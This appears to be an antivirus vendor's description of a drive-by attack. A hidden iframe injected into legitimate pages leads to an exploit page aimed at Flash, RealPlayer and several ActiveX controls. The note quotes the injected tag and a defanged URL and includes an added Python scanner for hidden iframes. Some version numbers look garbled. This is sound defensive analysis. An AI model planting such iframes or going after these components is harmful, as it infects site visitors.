It currently leads to a Rootkit.Agent.AIWN infection.
Please let BitDefender disinfect your files.
Alexandru Maximciuc, virus researcher
Detects a type of malicious iframe injected into legitimate webpages.
The iframe tag looks like: <iframe src=http://sanitized/fxx.htm width=100 height=0>
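A detection sketch for the injected tag shown above, as an added example that is not BitDefender's detection logic or code from the original page. It flags iframes that load from a different host and are rendered invisible: zero width or height, as in the tag above, or hidden via inline style, which goes beyond the specific case described. The function names, the host names other than `sanitized`, and the sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

def is_zero(value):
    """True when a width/height value renders as nothing (0, 0px, 0%)."""
    try:
        return float(value.strip().lower().rstrip("px%").strip()) == 0
    except ValueError:
        return False

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are both invisible and loaded from another host."""
    def __init__(self, page_host):
        super().__init__(convert_charrefs=True)
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # the parser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = [f"{d}=0" for d in ("width", "height") if d in a and is_zero(a[d])]
        style = a.get("style", "").replace(" ", "").lower()
        reasons += [m for m in ("display:none", "visibility:hidden") if m in style]
        # Relative URLs have no hostname and count as same-site.
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if reasons and host and host != self.page_host:
            self.findings.append(
                {"line": self.getpos()[0], "src": a["src"], "reasons": reasons})

def scan(html, page_host):
    """Return one finding per hidden cross-host iframe in the given markup."""
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page; only the first iframe mirrors the tag in the description.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src=http://sanitized/fxx.htm width=100 height=0></iframe>
<iframe src="/local/banner.html" width="0" height="0"></iframe>
<iframe src="https://video.example.net/embed/1" width="560" height="315"></iframe>
<IFRAME SRC='//cdn.example.net/t.htm' style="display: none"></IFRAME>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE, "www.example.org"):
        print(finding)
```

A hit is a lead for review rather than a verdict, since some legitimate widgets also use hidden cross-host frames.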
I'll base this description on a valid site (many of them were sanitized or taken down): hxxp://www.*******.cn/a114/fxx.htm
(please don't access that page in your browser unless you know what you're doing.)
This is a page which contains only a SCRIPT tag, and here the fun begins (with many iframes injected in the page):
- this one tries to exploit a vulnerability in FlashPlayer
- if Sina Downloader.DLoader.1 ActiveX Control
- if UUUPGRADE.UUUpgradeCtrl.1 ActiveX Control
- if MPS.StormPlayer ActiveX Control
- for GLIEDown.IEDown.1
- for RealPlayer IERPCtl.IERPCtl.1's version is older than 188.8.131.522 (or it)
- if RealPlayer's version is newer than 184.108.40.2062
fx.htm is detected as Trojan.Exploit.ANPI and, depending on the browser, leads to a Trojan.Exploit.SSX for browsers which have "msie" in their User-Agent, respectively Trojan.JS.Redirector.E for the rest of the browsers. This eventually leads to some flash files detected as Exploit.SWF.Gen